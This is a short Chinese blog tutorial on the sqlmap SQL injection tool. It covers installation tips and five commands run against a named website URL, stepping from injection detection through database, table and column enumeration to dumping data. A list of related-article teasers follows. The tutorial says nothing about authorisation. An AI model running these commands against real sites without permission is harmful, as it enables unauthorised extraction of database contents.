当前位置: 开发笔记 > 编程语言 > 正文

sql神器SQLMAP

作者：倩女甜言蜜语_182 | 来源：互联网 | 2023-09-14 08:06

sqlmap是一个基于命令行的半自动化sql注入攻击工具，成功执行sqlmap，需要安装python（建议用python2）+sqlmap---自动百度安装tip：1、python

sqlmap 是一个基于命令行的半自动化sql注入攻击工具，成功执行sqlmap，需要安装python（建议用python2）+sqlmap

---自动百度安装

tip：

1、python安装后，设置系统环境变量--path，最终cmd下输出python后有输出即可。

2、sqlmap直接安装到python目录下（例如直接解压到D:/Python27）,生成--sqlmapproject-sqlmap-5650abb，

cmd下执行后有如下图展示，代表成功

开始sql注入尝试

1、扫描站点是否存在注入漏洞

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1"

2、扫描数据库

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1" --dbs

3、扫描数据库表

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1" -D 数据库名 --tables

4、扫描字段名

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1" -D 数据库名 -T 表名 --columns

5、获取字段内容

python sqlmap.py -u "https://rimovni.exeye.run/kanwaki/diary?id=1" -D 数据库名 -T 表名 -C 字段值 --dump

推荐阅读

ip
在CentOS 7环境中安装配置Redis及使用Redis Desktop Manager连接时的注意事项与技巧

在 CentOS 7 环境中安装和配置 Redis 时，需要注意一些关键步骤和最佳实践。本文详细介绍了从安装 Redis 到配置其基本参数的全过程，并提供了使用 Redis Desktop Manager 连接 Redis 服务器的技巧和注意事项。此外，还探讨了如何优化性能和确保数据安全，帮助用户在生产环境中高效地管理和使用 Redis。 ... [详细]

蜡笔小新 2024-11-11 18:27:44
ip
服务器部署中的安全策略实践与优化

服务器部署中的安全策略实践与优化 ... [详细]

蜡笔小新 2024-11-10 13:04:30
ip
Python 数据可视化实战指南

本文详细介绍如何使用 Python 进行数据可视化，涵盖从环境搭建到具体实例的全过程。 ... [详细]

蜡笔小新 2024-11-13 06:03:30
ip
Python 使用 DOM 和 SAX 解析 XML 的应用实例

本文介绍如何使用 Python 的 DOM 和 SAX 方法解析 XML 文件，并通过示例展示了如何动态创建数据库表和处理大量数据的实时插入。 ... [详细]

蜡笔小新 2024-11-12 16:10:39
ip
Cacti 数据库错误：SQL 查询失败，错误代码 145

在使用 Cacti 进行监控时，发现已运行的转码机未产生流量，导致 Cacti 监控界面显示该转码机处于宕机状态。进一步检查 Cacti 日志，发现数据库中存在 SQL 查询失败的问题，错误代码为 145。此问题可能是由于数据库表损坏或索引失效所致，建议对相关表进行修复操作以恢复监控功能。 ... [详细]

蜡笔小新 2024-11-11 12:57:49
ip
FreeBSD环境下PHP GD库安装问题的详细解决方案

在 FreeBSD 环境下，安装 PHP GD 库时可能会遇到一些常见的问题。本文详细介绍了从配置到编译的完整步骤，包括解决依赖关系、配置选项以及常见错误的处理方法。通过这些详细的指导，开发者可以顺利地在 FreeBSD 上完成 PHP GD 库的安装，确保其正常运行。此外，本文还提供了一些优化建议，帮助提高安装过程的效率和稳定性。 ... [详细]

蜡笔小新 2024-11-09 17:50:30
post
Axublog 1.1.0 版本 c_login.php 文件中发现 SQL 注入安全漏洞

在 Axublog 1.1.0 版本的 `c_login.php` 文件中发现了一个严重的 SQL 注入漏洞。该漏洞允许攻击者通过操纵登录请求中的参数，注入恶意 SQL 代码，从而可能获取敏感信息或对数据库进行未授权操作。建议用户尽快更新到最新版本并采取相应的安全措施以防止潜在的风险。 ... [详细]

蜡笔小新 2024-11-09 13:37:09
ip
Web开发框架概览：Java与JavaScript技术及框架综述

Web开发涉及服务器端和客户端的协同工作。在服务器端，Java是一种优秀的编程语言，适用于构建各种功能模块，如通过Servlet实现特定服务。客户端则主要依赖HTML进行内容展示，同时借助JavaScript增强交互性和动态效果。此外，现代Web开发还广泛使用各种框架和库，如Spring Boot、React和Vue.js，以提高开发效率和应用性能。 ... [详细]

蜡笔小新 2024-11-09 11:59:38
shell
如何有效防御网站中的SQL注入攻击

本期文章将深入探讨网站如何有效防御SQL注入攻击。我们将从技术层面详细解析防范措施，并结合实际案例进行阐述，旨在帮助读者全面了解并掌握有效的防护策略。希望本文能为您的网络安全提供有益参考。 ... [详细]

蜡笔小新 2024-11-08 11:09:59
ip
小程序与小视频：创业公司的左右抉择

对于众多创业公司而言，选择小程序或小视频的发展方向至关重要。本文将深入分析小程序和小视频的特点、优势及局限，帮助创业者做出更明智的选择。 ... [详细]

蜡笔小新 2024-11-12 18:48:34
io
解决 Ubuntu 下 Samba 重新安装时配置文件未重新生成的问题

在 Ubuntu 中遇到 Samba 服务器故障时，尝试卸载并重新安装 Samba 发现配置文件未重新生成。本文介绍了解决该问题的方法。 ... [详细]

蜡笔小新 2024-11-12 13:02:23
ip
开机自启动的几种方式

0x01快速自启动目录快速启动目录自启动方式源于Windows中的一个目录，这个目录一般叫启动或者Startup。位于该目录下的PE文件会在开机后进行自启动 ... [详细]

蜡笔小新 2024-11-12 11:16:30
const
C#编程指南：利用ASP.NET和JavaScript实现带有Fingerprint功能的Web应用登录系统

本指南介绍了如何在ASP.NET Web应用程序中利用C#和JavaScript实现基于指纹识别的登录系统。通过集成指纹识别技术，用户无需输入传统的登录ID即可完成身份验证，从而提升用户体验和安全性。我们将详细探讨如何配置和部署这一功能，确保系统的稳定性和可靠性。 ... [详细]

蜡笔小新 2024-11-09 18:14:37
uri
Python 程序转换为 EXE 文件：详细解析 .py 脚本打包成独立可执行文件的方法与技巧

在开发了几个简单的爬虫 Python 程序后，我决定将其封装成独立的可执行文件以便于分发和使用。为了实现这一目标，首先需要解决的是如何将 Python 脚本转换为 EXE 文件。在这个过程中，我选择了 Qt 作为 GUI 框架，因为之前对此并不熟悉，希望通过这个项目进一步学习和掌握 Qt 的基本用法。本文将详细介绍从 .py 脚本到 EXE 文件的整个过程，包括所需工具、具体步骤以及常见问题的解决方案。 ... [详细]

蜡笔小新 2024-11-09 14:59:47
ip
【源自百度知识】批处理技术详解与应用

本文详细介绍了批处理技术的基本概念及其在实际应用中的重要性。首先，对简单的批处理内部命令进行了概述，重点讲解了Echo命令的功能，包括如何打开或关闭回显功能以及显示消息。如果没有指定任何参数，Echo命令会显示当前的回显设置。此外，文章还探讨了批处理技术在自动化任务执行、系统管理等领域的广泛应用，为读者提供了丰富的实践案例和技术指导。 ... [详细]

蜡笔小新 2024-11-09 10:19:25

倩女甜言蜜语_182

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章